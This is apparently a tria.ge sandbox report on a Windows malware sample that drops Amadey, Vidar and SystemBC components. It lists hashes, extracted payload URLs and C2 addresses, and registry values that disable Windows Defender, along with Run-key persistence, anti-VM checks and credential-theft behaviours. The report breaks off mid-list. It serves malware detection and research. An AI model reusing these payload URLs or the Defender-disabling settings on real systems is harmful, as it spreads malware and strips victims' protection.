Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/02/2025, 04:52
Static task
static1
Behavioral task
behavioral1
Sample
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Resource
win10v2004-20250217-en
General
-
Target
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
-
Size
2.1MB
-
MD5
34a6ac1fec0b84dac8301a70322231df
-
SHA1
8d9384ae55556cb5a5283a060cf8145a6b37d067
-
SHA256
f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0
-
SHA512
09a422872484ef19a1fc72371b08affd781c9571e96fc293a79df829b62b5188fa9124515e7384e652f333b42f097b6f9044ce37e359d8f9085edf06d28ae567
-
SSDEEP
49152:YS2K2eIrOz0Vv8u3ANStWoh1nZkzmGY2C4oSqn:YS2K2eIrOAZ8u3AE0ovZkK514Lq
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Signatures
-
Amadey family
-
Detect Vidar Stealer 18 IoCs
resource yara_rule behavioral1/memory/1760-61-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-63-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-56-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-54-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-58-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-158-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-178-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-197-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-219-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-314-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-333-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-336-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-358-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-368-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-378-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-382-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-407-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/1760-408-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2564-749-0x0000000001080000-0x00000000014D6000-memory.dmp healer behavioral1/memory/2564-750-0x0000000001080000-0x00000000014D6000-memory.dmp healer behavioral1/memory/2564-870-0x0000000001080000-0x00000000014D6000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Systembc family
-
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 8f9cdc126e.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ kdMujZh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mcwnj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f1c548477b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6610a02fea.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b48baaab9c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3a3b5fb167.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aa0be991e6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 468c3dbc43.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f9cdc126e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE -
Blocklisted process makes network request 3 IoCs
flow pid Process 64 1296 powershell.exe 77 2060 powershell.exe 195 3104 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 1296 powershell.exe 2060 powershell.exe 3104 powershell.exe 1416 powershell.exe 2088 powershell.exe 1232 powershell.exe 3652 powershell.exe -
Detects GOST tunneling tool 1 IoCs
A simple tunneling tool written in Golang
resource yara_rule behavioral1/files/0x0005000000012261-415.dat Gost -
Downloads MZ/PE file 33 IoCs
flow pid Process 77 2060 powershell.exe 195 3104 powershell.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 5 2728 skotes.exe 61 2728 skotes.exe 61 2728 skotes.exe 61 2728 skotes.exe 61 2728 skotes.exe 61 2728 skotes.exe 173 4016 BitLockerToGo.exe 276 3816 468c3dbc43.exe 276 3816 468c3dbc43.exe 276 3816 468c3dbc43.exe 276 3816 468c3dbc43.exe 276 3816 468c3dbc43.exe 276 3816 468c3dbc43.exe 64 1296 powershell.exe 79 2804 futors.exe 124 2804 futors.exe -
Uses browser remote debugging 2 TTPs 16 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2912 chrome.exe 876 chrome.exe 1952 chrome.exe 608 chrome.exe 2408 chrome.exe 2828 chrome.exe 2948 chrome.exe 888 chrome.exe 2352 chrome.exe 1748 chrome.exe 288 chrome.exe 2904 chrome.exe 2240 chrome.exe 3828 chrome.exe 3832 chrome.exe 1884 chrome.exe -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aa0be991e6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mcwnj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6610a02fea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b48baaab9c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6610a02fea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 468c3dbc43.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mcwnj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kdMujZh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f9cdc126e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f1c548477b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 468c3dbc43.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f9cdc126e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aa0be991e6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f1c548477b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3a3b5fb167.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3a3b5fb167.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b48baaab9c.exe -
Executes dropped EXE 51 IoCs
pid Process 2728 skotes.exe 1372 7aencsM.exe 1760 7aencsM.exe 2816 3omTNLZ.exe 1728 dzvh4HC.exe 2904 YMci4Rc.exe 2856 YMci4Rc.exe 1604 9aiiMOQ.exe 2232 9aiiMOQ.exe 2608 NL58452.exe 296 NL58452.exe 2356 f3Ypd8O.exe 2548 f3Ypd8O.exe 2536 kdMujZh.exe 2712 amnew.exe 2804 futors.exe 1072 221457afdd.exe 2564 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 2372 mcwnj.exe 2148 483d2fa8a0d53818306efeb32d3.exe 3048 monthdragon.exe 1984 monthdragon.exe 2532 monthdragon.exe 1812 8f9cdc126e.exe 2560 f1c548477b.exe 2416 3a3b5fb167.exe 2616 6610a02fea.exe 1776 Bjkm5hE.exe 1728 Bjkm5hE.exe 900 NL58452.exe 1888 NL58452.exe 3392 dzvh4HC.exe 3484 b48baaab9c.exe 3796 7aencsM.exe 3832 7aencsM.exe 1216 f3Ypd8O.exe 1732 f3Ypd8O.exe 3772 d2YQIJa.exe 2512 9aiiMOQ.exe 776 9aiiMOQ.exe 1168 9aiiMOQ.exe 696 9aiiMOQ.exe 3676 DTQCxXZ.exe 3484 aa0be991e6.exe 3816 468c3dbc43.exe 3616 service123.exe 960 1c29bfe45e.exe 3904 dc4867a9cf.exe 2352 TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE 3152 92c7e4ad44.exe 2636 36f5f1ecb3.exe -
Identifies Wine through registry keys 2 TTPs 16 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine mcwnj.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine b48baaab9c.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 468c3dbc43.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 8f9cdc126e.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine f1c548477b.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 3a3b5fb167.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine kdMujZh.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 6610a02fea.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine aa0be991e6.exe -
Loads dropped DLL 64 IoCs
pid Process 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 2728 skotes.exe 1372 7aencsM.exe 2756 WerFault.exe 2756 WerFault.exe 2756 WerFault.exe 2756 WerFault.exe 2756 WerFault.exe 2728 skotes.exe 2728 skotes.exe 2728 skotes.exe 2728 skotes.exe 2728 skotes.exe 2904 YMci4Rc.exe 440 WerFault.exe 440 WerFault.exe 440 WerFault.exe 440 WerFault.exe 440 WerFault.exe 2728 skotes.exe 1604 9aiiMOQ.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2372 WerFault.exe 2728 skotes.exe 2608 NL58452.exe 2068 WerFault.exe 2068 WerFault.exe 2068 WerFault.exe 2068 WerFault.exe 2068 WerFault.exe 2728 skotes.exe 2356 f3Ypd8O.exe 2968 WerFault.exe 2968 WerFault.exe 2968 WerFault.exe 2968 WerFault.exe 2968 WerFault.exe 2728 skotes.exe 2728 skotes.exe 2728 skotes.exe 2712 amnew.exe 2728 skotes.exe 1296 powershell.exe 1296 powershell.exe 2060 powershell.exe 2060 powershell.exe 2804 futors.exe 2804 futors.exe 3048 monthdragon.exe 3048 monthdragon.exe 2052 WerFault.exe 2052 WerFault.exe 2052 WerFault.exe 2728 skotes.exe 2728 skotes.exe 2728 skotes.exe 2728 skotes.exe 2728 skotes.exe 2804 futors.exe 2804 futors.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\b48baaab9c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009200101\\b48baaab9c.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\aa0be991e6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088725001\\aa0be991e6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\468c3dbc43.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088726001\\468c3dbc43.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\1c29bfe45e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088727001\\1c29bfe45e.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\dc4867a9cf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088728001\\dc4867a9cf.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\221457afdd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088694101\\221457afdd.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088695021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\6610a02fea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009190101\\6610a02fea.exe" futors.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000019afd-604.dat autoit_exe behavioral1/files/0x000600000001ad83-1727.dat autoit_exe behavioral1/files/0x000400000001ced7-1833.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 2728 skotes.exe 2816 3omTNLZ.exe 2536 kdMujZh.exe 2564 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 2372 mcwnj.exe 2148 483d2fa8a0d53818306efeb32d3.exe 1812 8f9cdc126e.exe 2560 f1c548477b.exe 2416 3a3b5fb167.exe 2616 6610a02fea.exe 3484 b48baaab9c.exe 3772 d2YQIJa.exe 3484 aa0be991e6.exe 3816 468c3dbc43.exe 2352 TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE -
Suspicious use of SetThreadContext 12 IoCs
description pid Process procid_target PID 1372 set thread context of 1760 1372 7aencsM.exe 34 PID 2904 set thread context of 2856 2904 YMci4Rc.exe 55 PID 1604 set thread context of 2232 1604 9aiiMOQ.exe 58 PID 2608 set thread context of 296 2608 NL58452.exe 61 PID 2356 set thread context of 2548 2356 f3Ypd8O.exe 64 PID 3048 set thread context of 2532 3048 monthdragon.exe 98 PID 1776 set thread context of 1728 1776 Bjkm5hE.exe 106 PID 900 set thread context of 1888 900 NL58452.exe 118 PID 3796 set thread context of 3832 3796 7aencsM.exe 130 PID 1216 set thread context of 1732 1216 f3Ypd8O.exe 133 PID 3484 set thread context of 4016 3484 b48baaab9c.exe 145 PID 2512 set thread context of 696 2512 9aiiMOQ.exe 154 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\mcwnj.job kdMujZh.exe File opened for modification C:\Windows\Tasks\mcwnj.job kdMujZh.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 12 IoCs
pid pid_target Process procid_target 2756 1372 WerFault.exe 33 440 2904 WerFault.exe 54 2372 1604 WerFault.exe 57 2068 2608 WerFault.exe 60 2968 2356 WerFault.exe 63 2052 3048 WerFault.exe 96 1936 1776 WerFault.exe 105 2240 900 WerFault.exe 117 3904 3796 WerFault.exe 129 1168 1216 WerFault.exe 132 2900 2512 WerFault.exe 149 860 1812 WerFault.exe 100 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3a3b5fb167.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 92c7e4ad44.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36f5f1ecb3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 1c29bfe45e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3Ypd8O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 1c29bfe45e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened 